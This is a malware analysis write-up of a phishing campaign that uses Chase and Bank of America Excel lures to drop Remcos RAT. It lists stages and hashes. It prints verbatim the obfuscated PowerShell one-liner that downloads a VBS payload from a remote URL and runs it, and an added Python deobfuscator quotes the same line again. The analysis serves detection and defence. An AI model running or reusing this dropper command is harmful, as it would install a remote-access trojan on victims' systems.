Analysis of a Remcos RAT Dropper

Posted on 2022-01-24 by Dmitry Melikov

Some time ago, we discovered a large wave of phishing emails with an exciting delivery method. This article will describe this method and show how it works, starting from a malicious document. We will explore the following documents, each with a beautiful visual lure that abuses the names and logos of Chase Bank and Bank of America.

File Type: xlsx document
SHA-256: c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915
Figure 1: Chase branded coercive lure

Figure 2: Bank of America branded coercive lure

ping google.com;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.twt\''+pmet:vne$,''gv6BNpMg30gwvPA=yekhtua&30212%3F148E16A9A6766D=diser&3F148E16A9A6766D=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\twt.vbs')  

The document runs the following script at startup to fetch the first-stage payload. Its purpose is simple: it pings google.com to check for an internet connection and, if one exists, downloads and executes the payload.

SHA-256: 3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71 

Figure 3: tweet.vs (First stage)
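The reversal trick in the one-liner above can be undone statically, without handing anything to IEX. The following Python is an added example (not from the original post or from InQuest's tooling): it collects the single-quoted string assignments, joins them in the order given by the -Join expression, reverses the result and pulls out the download URL and drop path; the sample it parses is the dropper command quoted above, treated purely as text.

```python
import re

# Constructed sample: the dropper one-liner quoted in the write-up above,
# handled purely as text (nothing here executes PowerShell).
SAMPLE = (
    r"ping google.com;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; "
    r"$c3=')''sbv.twt\''+pmet:vne$,''gv6BNpMg30gwvPA=yekhtua&30212%3F148E16A9A6766D=diser"
    r"&3F148E16A9A6766D=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';"
    r"$TC=$c3,$b4df,$we22 -Join '';"
    r"IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');"
    r"start-process($env:temp+ '\twt.vbs')"
)

# $name='lit' + 'lit' ...  (single-quoted PowerShell literals; '' escapes a quote)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*((?:'(?:[^']|'')*'\s*(?:\+\s*)?)+)")
LITERAL_RE = re.compile(r"'((?:[^']|'')*)'")
# $TC=$a,$b,$c -Join ''  (array of variables concatenated in the given order)
JOIN_RE = re.compile(r"\$\w+\s*=\s*((?:\$\w+\s*,\s*)*\$\w+)\s+-join\s+''", re.IGNORECASE)


def deobfuscate(script: str) -> str:
    """Rebuild the string the dropper hands to IEX, without evaluating it."""
    parts = {}
    for name, rhs in ASSIGN_RE.findall(script):
        pieces = LITERAL_RE.findall(rhs)
        parts[name] = "".join(p.replace("''", "'") for p in pieces)
    match = JOIN_RE.search(script)
    if match is None:
        raise ValueError("no '$var,$var -Join' expression found")
    order = re.findall(r"\$(\w+)", match.group(1))
    joined = "".join(parts[name] for name in order)
    # [regex]::Matches($TC,'.','RightToLeft') ... -join '' is a plain reversal.
    return joined[::-1]


def extract_indicators(command: str) -> dict:
    """Pull the download URL and the drop path out of the recovered command."""
    url = re.search(r"https?://[^'\s]+", command)
    drop = re.search(r"\$env:temp\+'([^']+)'", command)
    return {
        "url": url.group(0) if url else None,
        "drop_path": drop.group(1) if drop else None,
    }


if __name__ == "__main__":
    recovered = deobfuscate(SAMPLE)
    print(recovered)
    print(extract_indicators(recovered))
```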

The first-stage payload in turn loads the next stage. The script obscures the download URL of the next-stage payload in a simple way: each character is converted to its hexadecimal value.

Figure 4: tvt.vbs

This section of code shows that the downloaded payload is written to the registry so that the malicious application is launched again when the system reboots.

Figure 5: Stage 2


The second-stage payload is the PowerShell script shown in the following image; it is embedded here in the form of shellcode.

Figure 6: PowerShell script

The last component in the attack chain is the most interesting: a .js script that carries an executable library in its body, as shown in the following image. The executable is deliberately littered with junk characters to hinder static detection; at run time the script replaces these filler characters with zeros and then starts the dynamic link library.

File Type: JavaScript
SHA-256: ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd
Figure 7: JS containing an obfuscated executable library

After extracting and cleaning the data, we obtain an executable library written in C#. This is the final stage of infection in this campaign.

File Type: .NET executable
SHA-256: b7fd83f6d8bbd17d4aefa8f4e28d4503f1c4ab6ab70401b1a67e209da6197cde
SHA-256: 73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1

The final executable library is Remcos RAT, a remote-access tool that gives attackers unauthorized remote control over the targeted systems.

InQuest Deep File Inspection (DFI) successfully detects malicious documents that are the first step in this campaign. 

IOCs

